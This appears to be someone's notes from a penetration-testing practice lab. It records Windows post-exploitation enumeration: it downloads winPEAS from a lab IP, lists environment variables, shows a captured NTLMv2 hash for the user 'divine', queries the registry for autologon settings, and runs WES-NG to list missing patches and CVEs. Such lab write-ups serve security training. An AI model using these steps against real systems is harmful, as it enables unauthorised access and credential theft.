PEAS
Conducting an automated enumeration after performing a manual enumeration
PS C:\Users\divine> iwr -Uri http://192.168.45.155/winPEASx64.exe -OutFile .\winPEASx64.exeDelivery complete
/Practice/Mice/4-Post_Enumeration/attachments/Pasted-image-20250417220414.png)
Executing PEAS
ENV
���������� User Environment Variables
� Check for some passwords or keys in the env variables
COMPUTERNAME: REMOTE-PC
PSExecutionPolicyPreference: Bypass
HOMEPATH: \Users\divine
LOCALAPPDATA: C:\Users\divine\AppData\Local
PSModulePath: C:\Users\divine\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
PROCESSOR_ARCHITECTURE: AMD64
Path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Users\divine\AppData\Local\Microsoft\WindowsApps;
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ProgramFiles(x86): C:\Program Files (x86)
PROCESSOR_LEVEL: 25
LOGONSERVER: \\REMOTE-PC
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
HOMEDRIVE: C:
SystemRoot: C:\WINDOWS
SESSIONNAME: Console
ALLUSERSPROFILE: C:\ProgramData
DriverData: C:\Windows\System32\Drivers\DriverData
USERPROFILE: C:\Users\divine
FPS_BROWSER_APP_PROFILE_STRING: Internet Explorer
APPDATA: C:\Users\divine\AppData\Roaming
PROCESSOR_REVISION: 1101
USERNAME: divine
CommonProgramW6432: C:\Program Files\Common Files
TEMP: C:\Users\divine\AppData\Local\Temp
OneDrive: C:\Users\divine\OneDrive
CommonProgramFiles: C:\Program Files\Common Files
OS: Windows_NT
USERDOMAIN_ROAMINGPROFILE: REMOTE-PC
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 17 Stepping 1, AuthenticAMD
ComSpec: C:\WINDOWS\system32\cmd.exe
PROMPT: $P$G
SystemDrive: C:
FPS_BROWSER_USER_PROFILE_STRING: Default
ProgramFiles: C:\Program Files
NUMBER_OF_PROCESSORS: 2
TMP: C:\Users\divine\AppData\Local\Temp
ProgramData: C:\ProgramData
ProgramW6432: C:\Program Files
windir: C:\WINDOWS
USERDOMAIN: REMOTE-PC
PUBLIC: C:\Users\Public
���������� System Environment Variables
� Check for some passwords or keys in the env variables
ComSpec: C:\WINDOWS\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
Path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\WINDOWS\TEMP
TMP: C:\WINDOWS\TEMP
USERNAME: SYSTEM
windir: C:\WINDOWS
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 25
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 17 Stepping 1, AuthenticAMD
PROCESSOR_REVISION: 1101N/A
/Practice/Mice/4-Post_Enumeration/attachments/{050555A4-BC2F-4EFE-B1D6-6EE967EE4409}.png)
AV
/Practice/Mice/4-Post_Enumeration/attachments/{689384F7-D476-45D6-AC6F-96E5891FDE61}.png)
UAC
/Practice/Mice/4-Post_Enumeration/attachments/{741B9FC6-7584-40B7-A4C3-070D32F4B315}.png)
PowerShell
/Practice/Mice/4-Post_Enumeration/attachments/{3ADABF42-9D68-48CC-A681-475AA1D6C025}.png)
NTLM
/Practice/Mice/4-Post_Enumeration/attachments/{9F635B11-97F4-4928-8F87-14E4D54DFFEF}.png)
/Practice/Mice/4-Post_Enumeration/attachments/{4510C097-6012-48EA-900B-E24B1757B94E}.png)
divine::REMOTE-PC:1122334455667788:30eca8c0dfdced024fecaedea5f06e5a:0101000000000000fa4760ded3afdb01a0fc8ad3acae8452000000000800300030000000000000000000000000200000719de87947e6fe561bef7d90965917aed3c97a8062319881d6991122ba59657c0a00100000000000000000000000000000000000090000000000000000000000
.NET
/Practice/Mice/4-Post_Enumeration/attachments/{3F1C1B54-5EB0-4CC9-BB13-71E07DC7DC75}.png)
Token Privileges (divine)
/Practice/Mice/4-Post_Enumeration/attachments/{6BCD83EE-ABBC-4EE3-B0B0-8B0729D188CE}.png)
RDP Session
/Practice/Mice/4-Post_Enumeration/attachments/{95D91E68-8A81-4F04-974B-B5F6601436EB}.png)
AutoLogon
/Practice/Mice/4-Post_Enumeration/attachments/{005D9F11-B506-4A71-84F7-EDB2E2D53B51}.png)
PS C:\Users\divine> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
LastLogOffEndTimePerfCounter REG_QWORD 0x3eec4d37
ShutdownFlags REG_DWORD 0x8000022b
Userinit REG_SZ C:\Windows\system32\userinit.exe,
DisableCad REG_DWORD 0x1
DisableLockWorkstation REG_DWORD 0x0
EnableFirstLogonAnimation REG_DWORD 0x1
AutoLogonSID REG_SZ S-1-5-21-2619112490-2635448554-1147358759-1002
LastUsedUsername REG_SZ divine
AutoAdminLogon REG_SZ 1
DefaultUserName REG_SZ divine
DefaultDomainName REG_SZ DESKTOP-8OB2COP
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKeyServices
/Practice/Mice/4-Post_Enumeration/attachments/{8907C590-A9D2-4CBA-A475-C483A0748980}.png)
RemoteMouseService
Modifiables
/Practice/Mice/4-Post_Enumeration/attachments/{3F75702F-9D91-4568-9EB3-A4CE0C9B57A1}.png)
DNS Cached
/Practice/Mice/4-Post_Enumeration/attachments/{F5150F73-FED3-4371-B3CC-6089A1B92B1D}.png)
WESNG
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mice]
└─$ wes --update ; wes sysinfo --exploits-only --hide "Internet Explorer" Edge Flash
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Updating definitions
[+] Obtained definitions created at 20250412
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
- Name: Windows 10 Version 20H2 for x64-based Systems
- Generation: 10
- Build: 19042
- Version: 20H2
- Architecture: x64-based
- Installed hotfixes (6): KB5007289, KB4562830, KB4580325, KB5007186, KB5006753, KB5005699
[+] Loading definitions
- Creation date of definitions: 20250412
[+] Determining missing patches
[+] Applying display filters
[!] Found vulnerabilities!
Date: 20210413
CVE: CVE-2021-27094
KB: KB5001330
Title: Windows Early Launch Antimalware Driver Security Feature Bypass Vulnerability
Affected product: Windows 10 Version 20H2 for x64-based Systems
Affected component: Windows ELAM
Severity: Important
Impact: Security Feature Bypass
Exploits: https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66, https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66
Date: 20210413
CVE: CVE-2021-27094
KB: KB5001330
Title: Windows Early Launch Antimalware Driver Security Feature Bypass Vulnerability
Affected product: Windows 10 Version 20H2 for x64-based Systems
Affected component: Windows ELAM
Severity: Important
Impact: Security Feature Bypass
Exploits: https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66, https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66
Date: 20210413
CVE: CVE-2021-28447
KB: KB5001330
Title: Windows Early Launch Antimalware Driver Security Feature Bypass Vulnerability
Affected product: Windows 10 Version 20H2 for x64-based Systems
Affected component: Windows Early Launch Antimalware Driver
Severity: Important
Impact: Security Feature Bypass
Exploits: https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66, https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66
Date: 20210413
CVE: CVE-2021-28447
KB: KB5001330
Title: Windows Early Launch Antimalware Driver Security Feature Bypass Vulnerability
Affected product: Windows 10 Version 20H2 for x64-based Systems
Affected component: Windows Early Launch Antimalware Driver
Severity: Important
Impact: Security Feature Bypass
Exploits: https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66, https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66
[-] Missing patches: 1
- KB5001330: patches 4 vulnerabilities
[I] KB with the most recent release date
- ID: KB5001330
- Release date: 20210413
[+] Done. Displaying 4 of the 211 vulnerabilities found.N/